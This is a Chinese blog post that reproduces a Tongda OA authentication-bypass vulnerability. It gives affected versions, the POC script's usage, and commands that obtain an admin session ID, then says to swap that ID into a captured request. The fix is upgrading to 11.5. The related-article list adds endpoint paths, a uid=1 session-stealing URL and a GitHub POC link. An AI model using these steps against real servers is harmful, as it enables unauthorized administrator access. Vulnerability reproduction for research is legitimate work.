通达OA 前台任意用户登录漏洞复现

最新推荐文章于 2024-10-28 16:03:04 发布
最新推荐文章于 2024-10-28 16:03:04 发布
阅读量394 收藏
点赞数
文章标签: 安全 python java linux 人工智能
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37602797/article/details/117811825
版权
本文详细介绍了通达OA系统的一个高危漏洞,允许攻击者绕过登录验证,伪装成管理员。影响版本包括通达OA2017及V11.X(低于V11.5)。提供了复现环境搭建方法和Python POC代码。修复措施是升级到11.5版本。文章还包含了漏洞复现步骤和数据包操作说明。
摘要由CSDN通过智能技术生成

v2-33d93b907c3f53d50ef78d5d78ec9441_b.jpg


一、漏洞描述

通达OA是一套办公系统。通达OA官方于4月17日发布安全更新。经分析,在该次安全更新中修复了包括任意用户登录在内的高危漏洞。攻击者通过构造恶意请求,可以直接绕过登录验证逻辑,伪装为系统管理员身份登录OA系统。

二、影响版本

通达OA2017、V11.X<V11.5

环境搭建​:自行镜像环境搭建(后台回复“tongda”获取环境和POC)

本实验复现环境使用2017版本​。

三、漏洞复现

详细POC参数

➜ thelostworld git:(master) python3 tongda-oA.py -husage: POC.py [-h] [-v {11,2017}] [-url TARGETURL]​​optional arguments:-h, --help showthishelp messageandexit-v {11,2017}, --tdoaversion {11,2017}Target TongDa OA Version. e.g: -v11、-v2017 -url TARGETURL, --targeturl TARGETURLTarget URL. e.g: -url192.168.2.1、-url 192.168.2.1

获取SESSIONID

V11.X 版本

python3 POC.py -v 11 -url XXX.com


v2-36d20b9c83be69fce981abe038e34cfe_b.png


2017版本

python3POC.py-v2017-urlXXX.com


v2-35eedd71559022571ba48975bb8b1adf_b.png


抓取数据包替换SESSIONID


v2-7b632a7f3a1ae864250c5b31911d8e4d_b.jpg


四、漏洞修复

及时更新11.5版本

tongda2000.com/download

参考:

vas.riskivy.com/vuln-de

mp.weixin.qq.com/s/aZMR

后台回复“tongda”获取环境和POC

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!


v2-8ca564e9be97c3baa1f87c4e7bc9e156_b.jpg


个人知乎:zhihu.com/people/fu-wei

个人简书:jianshu.com/u/bf0e38a8d

​原文连接:

mp.weixin.qq.com/s?

thelostworld-公众号
关注
漏洞复现-通达OA通达OA前台任意用户登录漏洞
xiaokp7的博客
06-18 2840
通达OAOffice Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA < 11.5.200417存在一个认证绕过漏洞,利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码,成功登录系统管理员账户,继而在系统后台上传恶意文件控制网站服务器。
通达OA任意用户登录漏洞复现
谢公子的博客
01-03 2548
通达OA 前台任意用户登录漏洞 漏洞描述 通达OA官方于4月17日发布安全更新。在该次安全更新中修复了包括任意用户登录在内的高危漏洞。攻击者通过构造恶意请求,可以直接绕过登录验证逻辑,伪装为系统管理身份登录OA系统。 影响范围 通达OA2017 (V10.x) 通达OAV11.x < 11.5.200417漏洞复现 搭建好环境,这里环境使用的是通达OA2017 利用脚本获取cookie python3 tongda-oA.py -v 2017 -ur.
通达OA前台任意用户登录漏洞
weixin_50464560的博客
03-16 2334
1 漏洞描述通达OA是一套使用比较广泛的办公系统。该漏洞因为使用uid作为身份标识,攻击者通过构造恶意请求,可以直接绕过登录验证逻辑,伪装为系统管理员身份登录OA系统。通达OA官方于2020年4月17日发布安全更新。2 影响通达OA < 11.5.200417通达OA 2017本3 漏洞原理本次复现2017本,则重点分析该本,但原理都是基本相同的,只不过文件路径不同而已。根据POC的代码分析如下,该漏洞涉及的文件包含以下四个:/ispirit/login_code.php/genera
通达OA前台任意用户登录漏洞复现
weixin_60508121的博客
11-07 2179
isIE=0&modify_pwd=0,抓包,替换cookie中的PHPSESSID参数,放包,成功登录。通达OA是一套国内常用的办公系统,此次安全更新修复的高危漏洞任意用户登录漏洞。1、下载https://cdndown.tongda2000.com/oa/2019/TDOA11.4.exe,安装,访问,如下,安装成功。2、下载poc,https://github.com/NS-Sp4ce/TongDaOA-Fake-User。通达OA 2017本。
通达oa漏洞复现
weixin_45006525的博客
05-25 1410
通达oa任意用户登录复现 1.漏洞原理 首先源码分析跟踪文件/general/login_code.php,php文件均经过了zend|54加密,使用在线网站解密即可 在线zend解密 源码分析: 第12行随机生成了一串登录的CODEUID,并在第35行通过set_cache方法将该标识CODEUID插入到redis缓存中,且第37行将该CODEUID进行了输出。所以想到通过访问该页面可以获得codeuid。 根进logincheck_code.php 发现uid可控,post可以指定uid的值。cod
通达OA前台伪造管理登陆cookie生成tongda.py
05-07
通达OA 前台伪造管理员登陆漏洞的cookie生成脚本,可以用以生成PHPsessionid,然后替换cookie,从而登陆通达OA后台。
通达OA前台任意用户伪造登录漏洞复现
m0_48520508的博客
07-14 1773
** 0x01简介 ** 北京通达信科科技有限公司是一支以管理软件研发、实施、服务与咨询为主营业务的高科技企业,隶属于世界500强企业中国兵器工业集团公司。 2019最值得购买的OA系统排名 通达OA采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。 ** 0x02漏洞介绍 ** 此次安全更新修复的高危漏洞任意用户伪造,
通达OA前台任意用户登录分析
最新发布
m0_52514790的博客
10-28 423
通达OA前台任意用户登录
通达OA漏洞检查工具V1.3
xiaokp7的博客
09-17 900
8、通达OA后台attachment_remark文件包含漏洞(TongdaOA_Attachment_remark_FileInclude)9、通达OA后台management任意文件上传漏洞(TongdaOA_Management_Upload)11、通达OA v11.6前台任意文件删除+任意文件上传漏洞(TongdaOA_Delete_Auth)4、通达OA后台ispirit任意文件上传漏洞(Tongda_Ispirit_Upload)5.新增通达OA v11.6前台任意文件删除+任意文件上传漏洞
TongDa_Scan:通达OA在线用户登录poc
03-13
进攻简述 通达OA v11.7中存在某接口查询在线用户,当用户在线时会返回PHPSESSION实现可登录后台系统 影响通达OA <v11.7 进攻利用 检测当前用户是否存在线 http://127.0.0.1/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 不在线 不在线显示RELOGIN 在线 在线页面空白,但已拿到SESSION 设置Cookie可直接登录后台 http://127.0.0.1/general/index.php 工具利用 # 指定 URL python3 .\TongDa_Scan.py -u 127.0.0.1 # 指定 uid 进行扫描 python3 .\TongDa_Scan.py -u 127.0.0.1 -i 1 # 批量扫描,默认扫描UID为1 python3 .\TongDa_Scan.py -f .
Thelostworld_OA漏洞利用工具V1.1
潇湘信安的博客
09-18 531
基于JavaFX图形化界面开发的快速OA类利用工具,作者收集和整理了目前工具的OA类验证及其利用的方式和方法,整合成一个方便快捷图形化的快速利用工具。
Java_OAexp工具设计及实现-Thelostworld_OA
thelostworld
05-02 3511
本文约1700字,阅读约需6分钟。本文主要介绍基于JavaFX图形化界面开发的快速OA类利用工具。笔者收集和整理了目前工具的OA类验证及其利用的方式和方法,整合成一个方便快捷图形化的快速利用工具。想要写这个工具的原因,主要是日常工作中,OA漏洞利用总是需要去找无数验证脚本,操作繁琐。为了方便日常渗透测试,简单快捷地进行OA利用渗透,方便团队提升效率,笔者撰写了这款工具。设计初期,笔者收集和查看了一些师傅所撰写的OA利用相关工具和文章,都是部分漏洞的利用和探测,比较单一。在这个情况下,笔者把现存披露的漏洞利用
什么是0day漏洞,1day漏洞和nday漏洞
dzqxwzoe的博客
03-16 2348
作者:火绒安全链接:https://www.zhihu.com/question/323059851/answer/2642868488来源:知乎著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。,通常就是指还,也就是已经。这种漏洞危害巨大,因此也深得黑客的喜爱。通常0-day漏洞被公开后,都会引起广泛关注,相关厂商也需要紧急评估并尽快推出补丁,因为利用0-day漏洞进行的会很快随之而来。
复现通达OA前台任意用户登录漏洞
qax
04-27 2388
因为看到最近各个博客论坛都在复现这个通达OA漏洞,正好那天同事给我发了一个poc,正好试一下
X凌OA系统任意文件读取&SSRF+JNDI远程命令执行组合
thelostworld
05-14 1184
X凌OA系统任意文件读取-SSRF+JNDI远程命令执行一、漏洞描述深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,同时利用ssrf可远程命令执行。二、漏洞影响蓝凌OA三、利用 蓝凌OA custom.jsp 任意文件读取漏洞 读取配置文件读取路径:/WEB-INF/KmssConfig/admin.properties读取文件:POC:POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: 127
通达OA 前台任意用户登录漏洞复现(更新手工获取cookie过程)
thelostworld
05-12 3641
新增内容1:范围今天不是炒冷饭:主要是昨天有个兄弟看了文章后问了一下怎么手动获取cookie,相互交流了一下,觉得还是有必要发一下,这个手工获取cookie的流程。一、漏洞描述通达OA是一套办公系统。通达OA官方于4月17日发布安全更新。经分析,在该次安全更新中修复了包括任意用户登录在内的高危漏洞。攻击者通过构造恶意请求,可以直接绕过登录验证逻辑,伪装为系统管理员身份登录OA系统。二、影响通达OA2017、V11.X<V11.5环境搭建:自行镜像环境搭建(后台回复“tongda”获取环境和POC)
通达OA软件测试工资,通达OA Office Anywhere 2015网络智能办公系统一处盲注漏洞/demo测试(需登录)...
weixin_31508009的博客
07-30 569
### 简要描述:最新,绕过过滤,直接注### 详细说明:厂商:通达信科测试demo地址:**.**.**.**/从官网(http://**.**.**.**/)直接点击集团在线试用进去以后,注入出在:list_report.php文件中```注入地址:**.**.**.**/general/data_center/model_design/design/report/list_report....
通达OA 前台任意用户登录漏洞getshell
热门推荐
Summer's blog
05-13 1万+
前言    本次文章可以分为两部分,第一部分通达OA前台管理员伪造登录,第二部分后台附件getshell。作为一个笔记吧。 漏洞复现 管理员伪造登录 找到后台登录地址抓包修改url 删除cookie目的是返回管理员cookie 删除encode_type=1后面的值,替换成UID=1 后台getshell 找到附件管理,看看有没有附件保存地址。若没有,则添加个。 在会话页面找到自己,发...
通达OA2017前台登录漏洞任意用户可利用的严重安全风险
通达OA2017前台任意用户登录漏洞是针对通达办公自动化(TongDa OA)软件在2017本及V11.X小于V11.5的一个严重安全漏洞。此漏洞允许攻击者利用未经身份验证的方式,通过精心构造的请求或利用系统中的设计缺陷,绕过...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值